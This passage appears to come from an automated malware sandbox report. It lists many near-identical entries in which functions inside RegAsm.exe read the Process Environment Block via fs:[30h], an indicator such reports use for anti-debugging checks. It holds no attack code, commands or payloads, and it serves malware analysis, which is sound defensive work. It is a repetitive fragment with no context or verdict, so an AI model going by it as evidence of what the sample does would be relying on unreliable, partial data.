                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE62A0 mov eax, dword ptr fs:[00000030h]7_2_02BE62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE62A0 mov eax, dword ptr fs:[00000030h]7_2_02BE62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE62A0 mov eax, dword ptr fs:[00000030h]7_2_02BE62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE72A0 mov eax, dword ptr fs:[00000030h]7_2_02BE72A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE72A0 mov eax, dword ptr fs:[00000030h]7_2_02BE72A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C252E2 mov eax, dword ptr fs:[00000030h]7_2_02C252E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8329E mov eax, dword ptr fs:[00000030h]7_2_02B8329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8329E mov eax, dword ptr fs:[00000030h]7_2_02B8329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED mov eax, dword ptr fs:[00000030h]7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0F2F8 mov eax, dword ptr fs:[00000030h]7_2_02C0F2F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8E284 mov eax, dword ptr fs:[00000030h]7_2_02B8E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8E284 mov eax, dword ptr fs:[00000030h]7_2_02B8E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD0283 mov eax, dword ptr fs:[00000030h]7_2_02BD0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD0283 mov eax, dword ptr fs:[00000030h]7_2_02BD0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD0283 mov eax, dword ptr fs:[00000030h]7_2_02BD0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C25283 mov eax, dword ptr fs:[00000030h]7_2_02C25283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B492FF mov eax, dword ptr fs:[00000030h]7_2_02B492FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B602E1 mov eax, dword ptr fs:[00000030h]7_2_02B602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B602E1 mov eax, dword ptr fs:[00000030h]7_2_02B602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B602E1 mov eax, dword ptr fs:[00000030h]7_2_02B602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7F2D0 mov eax, dword ptr fs:[00000030h]7_2_02B7F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7F2D0 mov eax, dword ptr fs:[00000030h]7_2_02B7F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C192A6 mov eax, dword ptr fs:[00000030h]7_2_02C192A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C192A6 mov eax, dword ptr fs:[00000030h]7_2_02C192A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C192A6 mov eax, dword ptr fs:[00000030h]7_2_02C192A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C192A6 mov eax, dword ptr fs:[00000030h]7_2_02C192A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4B2D3 mov eax, dword ptr fs:[00000030h]7_2_02B4B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4B2D3 mov eax, dword ptr fs:[00000030h]7_2_02B4B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4B2D3 mov eax, dword ptr fs:[00000030h]7_2_02B4B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B592C5 mov eax, dword ptr fs:[00000030h]7_2_02B592C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B592C5 mov eax, dword ptr fs:[00000030h]7_2_02B592C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5A2C3 mov eax, dword ptr fs:[00000030h]7_2_02B5A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5A2C3 mov eax, dword ptr fs:[00000030h]7_2_02B5A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5A2C3 mov eax, dword ptr fs:[00000030h]7_2_02B5A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5A2C3 mov eax, dword ptr fs:[00000030h]7_2_02B5A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5A2C3 mov eax, dword ptr fs:[00000030h]7_2_02B5A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7B2C0 mov eax, dword ptr fs:[00000030h]7_2_02B7B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7B2C0 mov eax, dword ptr fs:[00000030h]7_2_02B7B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7B2C0 mov eax, dword ptr fs:[00000030h]7_2_02B7B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7B2C0 mov eax, dword ptr fs:[00000030h]7_2_02B7B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7B2C0 mov eax, dword ptr fs:[00000030h]7_2_02B7B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7B2C0 mov eax, dword ptr fs:[00000030h]7_2_02B7B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7B2C0 mov eax, dword ptr fs:[00000030h]7_2_02B7B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4823B mov eax, dword ptr fs:[00000030h]7_2_02B4823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0B256 mov eax, dword ptr fs:[00000030h]7_2_02C0B256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0B256 mov eax, dword ptr fs:[00000030h]7_2_02C0B256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1D26B mov eax, dword ptr fs:[00000030h]7_2_02C1D26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1D26B mov eax, dword ptr fs:[00000030h]7_2_02C1D26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B87208 mov eax, dword ptr fs:[00000030h]7_2_02B87208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B87208 mov eax, dword ptr fs:[00000030h]7_2_02B87208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00274 mov eax, dword ptr fs:[00000030h]7_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B79274 mov eax, dword ptr fs:[00000030h]7_2_02B79274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B91270 mov eax, dword ptr fs:[00000030h]7_2_02B91270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B91270 mov eax, dword ptr fs:[00000030h]7_2_02B91270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B54260 mov eax, dword ptr fs:[00000030h]7_2_02B54260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B54260 mov eax, dword ptr fs:[00000030h]7_2_02B54260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B54260 mov eax, dword ptr fs:[00000030h]7_2_02B54260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4826B mov eax, dword ptr fs:[00000030h]7_2_02B4826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4A250 mov eax, dword ptr fs:[00000030h]7_2_02B4A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C25227 mov eax, dword ptr fs:[00000030h]7_2_02C25227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B56259 mov eax, dword ptr fs:[00000030h]7_2_02B56259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B49240 mov eax, dword ptr fs:[00000030h]7_2_02B49240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B49240 mov eax, dword ptr fs:[00000030h]7_2_02B49240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8724D mov eax, dword ptr fs:[00000030h]7_2_02B8724D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0C3CD mov eax, dword ptr fs:[00000030h]7_2_02C0C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0B3D0 mov ecx, dword ptr fs:[00000030h]7_2_02C0B3D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B733A5 mov eax, dword ptr fs:[00000030h]7_2_02B733A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B833A0 mov eax, dword ptr fs:[00000030h]7_2_02B833A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B833A0 mov eax, dword ptr fs:[00000030h]7_2_02B833A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BA739A mov eax, dword ptr fs:[00000030h]7_2_02BA739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BA739A mov eax, dword ptr fs:[00000030h]7_2_02BA739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B48397 mov eax, dword ptr fs:[00000030h]7_2_02B48397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B48397 mov eax, dword ptr fs:[00000030h]7_2_02B48397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B48397 mov eax, dword ptr fs:[00000030h]7_2_02B48397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0F3E6 mov eax, dword ptr fs:[00000030h]7_2_02C0F3E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7438F mov eax, dword ptr fs:[00000030h]7_2_02B7438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7438F mov eax, dword ptr fs:[00000030h]7_2_02B7438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4E388 mov eax, dword ptr fs:[00000030h]7_2_02B4E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4E388 mov eax, dword ptr fs:[00000030h]7_2_02B4E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4E388 mov eax, dword ptr fs:[00000030h]7_2_02B4E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C253FC mov eax, dword ptr fs:[00000030h]7_2_02C253FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6E3F0 mov eax, dword ptr fs:[00000030h]7_2_02B6E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6E3F0 mov eax, dword ptr fs:[00000030h]7_2_02B6E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6E3F0 mov eax, dword ptr fs:[00000030h]7_2_02B6E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B863FF mov eax, dword ptr fs:[00000030h]7_2_02B863FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C2539D mov eax, dword ptr fs:[00000030h]7_2_02C2539D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B603E9 mov eax, dword ptr fs:[00000030h]7_2_02B603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B603E9 mov eax, dword ptr fs:[00000030h]7_2_02B603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B603E9 mov eax, dword ptr fs:[00000030h]7_2_02B603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B603E9 mov eax, dword ptr fs:[00000030h]7_2_02B603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B603E9 mov eax, dword ptr fs:[00000030h]7_2_02B603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B603E9 mov eax, dword ptr fs:[00000030h]7_2_02B603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B603E9 mov eax, dword ptr fs:[00000030h]7_2_02B603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B603E9 mov eax, dword ptr fs:[00000030h]7_2_02B603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5A3C0 mov eax, dword ptr fs:[00000030h]7_2_02B5A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5A3C0 mov eax, dword ptr fs:[00000030h]7_2_02B5A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5A3C0 mov eax, dword ptr fs:[00000030h]7_2_02B5A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5A3C0 mov eax, dword ptr fs:[00000030h]7_2_02B5A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5A3C0 mov eax, dword ptr fs:[00000030h]7_2_02B5A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5A3C0 mov eax, dword ptr fs:[00000030h]7_2_02B5A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B583C0 mov eax, dword ptr fs:[00000030h]7_2_02B583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B583C0 mov eax, dword ptr fs:[00000030h]7_2_02B583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B583C0 mov eax, dword ptr fs:[00000030h]7_2_02B583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B583C0 mov eax, dword ptr fs:[00000030h]7_2_02B583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C25341 mov eax, dword ptr fs:[00000030h]7_2_02C25341
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B47330 mov eax, dword ptr fs:[00000030h]7_2_02B47330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1A352 mov eax, dword ptr fs:[00000030h]7_2_02C1A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7F32A mov eax, dword ptr fs:[00000030h]7_2_02B7F32A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4C310 mov ecx, dword ptr fs:[00000030h]7_2_02B4C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0F367 mov eax, dword ptr fs:[00000030h]7_2_02C0F367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B70310 mov ecx, dword ptr fs:[00000030h]7_2_02B70310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8A30B mov eax, dword ptr fs:[00000030h]7_2_02B8A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8A30B mov eax, dword ptr fs:[00000030h]7_2_02B8A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8A30B mov eax, dword ptr fs:[00000030h]7_2_02B8A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD930B mov eax, dword ptr fs:[00000030h]7_2_02BD930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD930B mov eax, dword ptr fs:[00000030h]7_2_02BD930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD930B mov eax, dword ptr fs:[00000030h]7_2_02BD930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BF437C mov eax, dword ptr fs:[00000030h]7_2_02BF437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B57370 mov eax, dword ptr fs:[00000030h]7_2_02B57370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B57370 mov eax, dword ptr fs:[00000030h]7_2_02B57370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B57370 mov eax, dword ptr fs:[00000030h]7_2_02B57370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD035C mov eax, dword ptr fs:[00000030h]7_2_02BD035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD035C mov eax, dword ptr fs:[00000030h]7_2_02BD035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD035C mov eax, dword ptr fs:[00000030h]7_2_02BD035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD035C mov ecx, dword ptr fs:[00000030h]7_2_02BD035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD035C mov eax, dword ptr fs:[00000030h]7_2_02BD035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD035C mov eax, dword ptr fs:[00000030h]7_2_02BD035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B49353 mov eax, dword ptr fs:[00000030h]7_2_02B49353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B49353 mov eax, dword ptr fs:[00000030h]7_2_02B49353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1132D mov eax, dword ptr fs:[00000030h]7_2_02C1132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1132D mov eax, dword ptr fs:[00000030h]7_2_02C1132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD2349 mov eax, dword ptr fs:[00000030h]7_2_02BD2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4D34C mov eax, dword ptr fs:[00000030h]7_2_02B4D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4D34C mov eax, dword ptr fs:[00000030h]7_2_02B4D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C250D9 mov eax, dword ptr fs:[00000030h]7_2_02C250D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B55096 mov eax, dword ptr fs:[00000030h]7_2_02B55096
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8909C mov eax, dword ptr fs:[00000030h]7_2_02B8909C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7D090 mov eax, dword ptr fs:[00000030h]7_2_02B7D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7D090 mov eax, dword ptr fs:[00000030h]7_2_02B7D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4D08D mov eax, dword ptr fs:[00000030h]7_2_02B4D08D
